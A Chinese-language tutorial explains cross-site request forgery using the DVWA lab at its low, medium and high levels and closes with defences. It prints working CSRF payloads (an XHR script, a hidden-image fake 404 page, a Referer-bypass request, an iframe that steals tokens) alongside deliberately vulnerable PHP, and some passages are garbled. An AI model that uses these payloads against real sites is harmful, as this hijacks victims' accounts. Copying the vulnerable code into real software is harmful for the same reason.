CSRF攻擊即跨站請求偽造(跨站點請求偽造),是一種對網站的惡意利用,聽起來似乎與XSS跨站腳本攻擊有點相似,但實際上彼此相差很大,XSS利用的是站點內的信任用戶,而CSRF則是通過偽裝來自受信任用戶的請求來利用受信任的網站。
你可以這么理解CSRF攻擊:攻擊者盜用了你的身份,以你的名義向第三方網站發送惡意請求。CRSF能做的事情包括利用你的身份發郵件,發短信,進行交易轉賬等,甚至盜取你的賬號。
那么,今天i春秋向小伙伴介紹一下CSRF突破原理的相關內容,希望對大家學習Web安全有所幫助。文章閱讀約15分鍾,一定要看完哦,文末內容更精彩〜
CSRF攻擊原理
當我們打開或登錄某個網站后,瀏覽器與網站所存放的服務器將會產生一個會話,在會話結束前,用戶就可以利用其自身的網站權限對網站進行操作,如:發表文章,發送郵件,會話結束后,在進行權限操作,網站就會知道會話超期或重新登錄。
當通過登錄網站后,瀏覽器就會和可信的站點建立一個經過認證的會話。所有通過這個經過認證的會話發送請求,都被認為是可信的行為,例如轉賬,匯款等操作。過長或者自主結束重疊,必須重新建立經過認證的可信安全的會話。
CSRF攻擊是建立在會話之上。例如:登錄了網上銀行,拆分轉換賬業務,這是攻擊者給你發來一個URL,這個URL是攻擊者精心構造的有效替代,攻擊者精心構造的轉賬業務代碼,而且與你登錄的是同一家銀行,當你認為這是安全的鏈接后點擊進去,你的錢就沒了!
例如想給用戶xxser轉賬1000元,正常的URL是:
secbug.org/pay.jsp?user=xxser&money=1000而攻擊者構造的URL則是:
secbug.org/pay.jsp?user=hack&money=10000
CSRF突破利用
CSRF進攻常常被用來制造蠕蟲攻擊,SEO流量等。
分析防御代碼
獲取GET參數用戶名和密碼,然后通過選擇語句查詢是否存在對應的用戶,如果存在通過$ _SESSION設置一個會話:isadmin = admin,否則設置會話:isadmin = guest
判斷會話中的isadmin是否為admin,如果isadmin!= admin說明用戶沒有登錄,那么切換到登錄頁面,只有在管理員登錄后才可以執行用戶的操作。
獲取POST參數用戶名和密碼然后插入用戶表中,完成添加用戶的操作。
<?php
session_start();
if (isset($_GET['login'])) {
$con=mysqli_connect("127.0.0.1","root","123456","test");
if (mysql_connect_errno()) {
echo "連接失敗".mysql_connect_errno();
}
$username = addslashes($_GET['username']);
$password = $_GET['password'];
$result = mysqli_query($con , "select * from users where username='".$username."' and password='".md5($password)."'");
$row = mysqli_fetch_array($result);
if($row){
$_SESSION['isadmin'] = 'admin';
exit("登錄成功");
} else{
$_SESSION['isadmin'] = 'guest';
exit("登錄失敗");
}
} else{
$_SESSION['isadmin'] = 'guest';
}
if($_SESSION['isadmin'] != 'admin'){
exit("請登錄……");
}
if(isset($_POST['submit'])){
if (isset($_POST['username'])) {
$result1 = mysqli_query($con,"insert into users(username , password) value ('".$_POST['username']."','".md5($_POST['password'])."')");
exit($_POST['username']."添加成功");
}
}
?>這是后台php源碼。
攻擊者需要做的就是構造一個請求,請求的URL就是php文件的URL,參數是submit = 1&username = 1&password = 1,請求有效載荷會自動利用原始碼的特性添加一個用戶:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>CSRF漏洞實踐</title>
</head>
<body>
<script type="text/javascript">
var pauses = new Array("16");
var methods = new Array("POST");
var urls = new Array("isadmin.php");
var params = new Array("submit=1&username=1&password=1");
function pausecomp(millis){
var date = new Date();
var curDate = null ;
do{
curDate = new Date();
}while(curDate-date<millis);
}
function run(){
var count = 1 ;
var i = 0 ;
for( i=0 ; i < count ; i ++){
makeXHR(methods[i],urls[i],params[i]);
pausecomp(pausecomp[i]);
}
}
var http_request = false ;
function makeXHR(method , url , paramters){
http_request = false ;
if(window.XMLHttpRequest){
http_request = new XMLHttpRequest() ;
if(http_request.overrideMinmeType){
http_request.overrideMinmeType('text/html');
}
} else if(window.ActiveXObject){
try{
http_request = new ActiveXObject("Msxml2.XMLHTTP");
} catch(e){
try{
http_request = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e){ }
}
}
if(!http_request){
alert('Cannot create XMLHTTP instance');
return false;
}
if(method == 'GET'){
if(url.indexOf('?') == -1){
url = url + '?' + paramters;
} else{
url = url + '&' + paramters;
}
http_request.open(method,url,true);
http_request.send("");
} else if(method == 'POST'){
http_request.open(method,url,true);
http_request.setRequestHeader("Content-type","application/x-www.form-urlencoded");
http_request.setRequestHeader("Content-length",paramters.length);
http_request.setRequestHeader("Connection","close");
http_request.send(paramters);
}
}
</script>
</body>
</html>DVWA平台CSRF
沒有找到比較好的原始文件,於是找到了DVWA。
low
- 前端源碼
<h3>Change your admin password:</h3>
<br>
<form action="#" method="GET">
New password:<br>
<input autocomplete="off" name="password_new" type="password"><br>
Confirm new password:<br>
<input autocomplete="off" name="password_conf" type="password"><br>
<br>
<input value="Change" name="Change" type="submit">
</form>前端原始碼的非常簡單,是一個修改密碼的CSRF,表單采用GET方式更改提交。
- 后端源碼
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// Get input
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Do the passwords match?
if( $pass_new == $pass_conf ) {
// They do!
$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass_new = md5( $pass_new );
// Update the database
$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Feedback for the user
echo "<pre>Password Changed.</pre>";
}
else {
// Issue with passwords matching
echo "<pre>Passwords did not match.</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>可以看到預期接收數據后會驗證兩次密碼是否重復,然后修改密碼。
- 構造有效Payload
http://127.0.0.1/DVWA-master/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#我們將Payload發送給受害者,受害者處於會話保持(登錄狀態)中,遭受一旦點擊該URL鏈接,就意味着受害者執行了同樣的操作,這個過程就是CSRF。
筆者位於的DVWA使用的登錄密碼,被替換為“ 123456”。
- 重點
這里的攻擊建立是利用受害者的Cookie向服務器發送偽造請求(Payload),如果用戶使用的是一個與xxser.com保持會話登錄的瀏覽器重置有效負載URL,受害者的密碼就會發生更改。
現如今,人們的安全意識普遍增高,我們可以采用短鏈接這種方式來進行優化,例如百度,新浪的短鏈接替代,以便減少圖片內容,密碼修改后的頁面會有提示。
- 高明的做法(從一位前輩copy過來的)
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Payload</title>
</head>
<body>
<img src="http://127.0.0.1/DVWA-master/vulnerabilities/csrf/?password_new=123456&password_conf=123456&Change=Change#" border="0" style="display: none">
<h1>404</h1>
<h2>file not found.</h2>
</body>
</html>頁面的作用是加載一個偽404的頁面,實際上可以訪問該頁面,就會加載圖片,所謂加載圖片就是加載src屬性,而src屬性則為Payload-URL,實際的行為就是加載該html頁面的同時圖片會加載,也就執行了有效負載。
middle
- 前端源碼(添加了http_referer頭的驗證)
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// HTTP_REFERER :查詢當前頁的前一頁的地址信息
// SERVER_NAME :獲取域名
if( stripos( $_SERVER[ 'HTTP_REFERER' ] ,$_SERVER[ 'SERVER_NAME' ]) !== false ) {
// stripos() :查字符第一次出現的位置,
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Do the passwords match?
if( $pass_new == $pass_conf ) {
// They do!
$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass_new = md5( $pass_new );
// Update the database
$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Feedback for the user
echo "<pre>Password Changed.</pre>";
}
else {
// Issue with passwords matching
echo "<pre>Passwords did not match.</pre>";
}
}
else {
// Didn't come from a trusted source
echo "<pre>That request didn't look correct.</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
?>
檢查HTTP_REFERER(http數據包的referer參數值)即上一級URL地址信息是否包含由HTTPHTTP數據包中的主機參數值;包含則表示當前頁面是從DVWA即上一級URL合法的行為。
合法的http數據包:
GET /DVWA-master/vulnerabilities/csrf/?password_new=1234&password_conf=1234&Change=Change HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://127.0.0.1/DVWA-master/vulnerabilities/csrf/
Cookie: security=medium; PHPSESSID=nfafklof4unqinb2b0jvvpl943
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Upgrade-Insecure-Requests: 1
留意第2行,第8行。
- 分析繞過
但是stripos()函數寫的頭驗證是可以繞過的〜stripos()函數是多次匹配;只要包含了目標主機地址就可以可以繞過過strips()函數寫的驗證語句
如果我們依舊按照建立一個偽造的攻擊頁面,stripos()頭驗證就會驗證,而頁面並非來自DVWA,於是深挖stripos()函數的擴展,發現函數會多次匹配,於是思路就是建立一個假的文件名,通過一個偽造的文件名,繞過stripos()的驗證。
- Payload
GET /DVWA-master/vulnerabilities/csrf/?password_new=mirror11&password_conf=mirror11&Change=Change HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://127.0.0.1/127.0.0.1.html
Cookie: security=medium; PHPSESSID=nfafklof4unqinb2b0jvvpl943
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
這里注意:我們將Payload命名為“ 127.0.0.1.html”
high
- 前端源碼
<?php
if( isset( $_GET[ 'Change' ] ) ) {
// 加入 Anti-CSRF token機制
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$pass_new = $_GET[ 'password_new' ];
$pass_conf = $_GET[ 'password_conf' ];
// Do the passwords match?
if( $pass_new == $pass_conf ) {
// They do!
$pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$pass_new = md5( $pass_new );
// Update the database
$insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
// Feedback for the user
echo "<pre>Password Changed.</pre>";
}
else {
// Issue with passwords matching
echo "<pre>Passwords did not match.</pre>";
}
((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}
// Generate Anti-CSRF token
generateSessionToken();
?>
加入反CSRF令牌機制,用戶訪問改密頁面時,服務器返回令牌,只有用戶提交令牌參數才可以進行改密行為。
- 分析繞過
我們構造有效載荷頁面的時候,就需要考慮到執行改密行為必須向服務器發送令牌,而令牌只有在改密頁面才可以獲得;
根據前輩的思路:利用受害者的cookie去改密頁面獲取令牌。
<script type="text/javascript">
function attack()
{
document.getElementsByName('user_token')[0].value=document.getElementById("hack").contentWindow.document.getElementsByName('user_token')[0].value;
document.getElementById("transfer").submit();
}
</script>
<iframe src="http://192.168.153.130/dvwa/vulnerabilities/csrf" id="hack" border="0" style="display:none;">
</iframe>
<body οnlοad="attack()">
<form method="GET" id="transfer" action="http://169.254.36.73/DVWA-master/vulnerabilities/csrf/">
<input type="hidden" name="password_new" value="password">
<input type="hidden" name="password_conf" value="password">
<input type="hidden" name="user_token" value="">
<input type="hidden" name="Change" value="Change">
</form>
</body>
攻擊提示是當受害者點擊進入該頁面,腳本會通過一個看不見框架偷偷訪問修改密碼的頁面,獲取頁面中的令牌,並向服務器發送改密請求,以完成CSRF攻擊。
然而理想與現實的差異是巨大的,這里牽扯到了跨域問題,而現在的瀏覽器是分離跨域請求的。這里簡單解釋下跨域,我們的框架iframe訪問的地址是http://169.254。 36.73 / DVWA主站/漏洞/ csrf /,位於服務器169.254.36.73上,而我們的攻擊頁面位於黑客服務器上,其中的域名不同,域名B下的所有頁面都主動獲取域名A下的頁面內容,除非域名A下的頁面主動發送信息給域名B的頁面,所以我們的攻擊腳本是不可能取到改密界面中的user_token。
由於跨域是不能實現的,所以我們將攻擊代碼注入到目標服務器169.254.36.73中,才有可能完成攻擊。下面利用高級XSS入侵協助贏得Anti-CSRF令牌(因為這里的XSS注入有長度限制,不能夠注入完整的攻擊腳本,所以只獲取Anti-CSRF token)
這里的名稱存在XSS突破,於是抓包,改參數,成功刪除令牌鏈接。
通過DVWA平台的CSRF實例,簡單的總結了CSRF的特性和應對措施:
CSRF應對措施
從DVWA的測試中總結:在不可能的等級的原始代碼中,利用了PDO技術防御SQL注入,CSRF方面則要求用戶原始密碼;攻擊者在不知道原始密碼的情況下是無法進行CSRF的!
CSRF防御手段
- 使用POST,限制GET
GET方式最容易受到CSRF攻擊,只要簡單的構造有效劑量就可能導致CSRF;使用POST可以大程度的減低CSRF顯示率
- 瀏覽器Cookie策略
老瀏覽器會攔截第三方本地Cookie的發送,而新瀏覽器則不會攔截發送;
- 添加驗證碼
簡單粗暴還有效;可以大程度的增加人機交互的過程,避免用戶被悄悄的偷襲
- 推薦人檢查
檢查請求是否來自於合法的源
- 反CSRF令牌
令牌的值必須是隨機的,不可預測的。由於令牌的存在,攻擊者無法再構造一個帶有合法令牌的請求實施CSRF攻擊。另外使用令牌時應注意其保密性,盡量把敏感的操作由GET改寫POST,以表格或AJAX形式提交,避免令牌替換。
- 總結
CSRF攻擊是攻擊者利用用戶的身份操作用戶帳戶的一種攻擊方式,通常使用反CSRF令牌來防御CSRF攻擊,同時要注意令牌的保密性和隨機性。
實際上是網絡安全除CSRF之外,還包括SQL注入,XSS等眾多知識點,繁雜且不成體系,若要深入學習Web安全攻防內容,一定要從基礎抓起:https://www.ichunqiu.com/train/course/11?form=weixin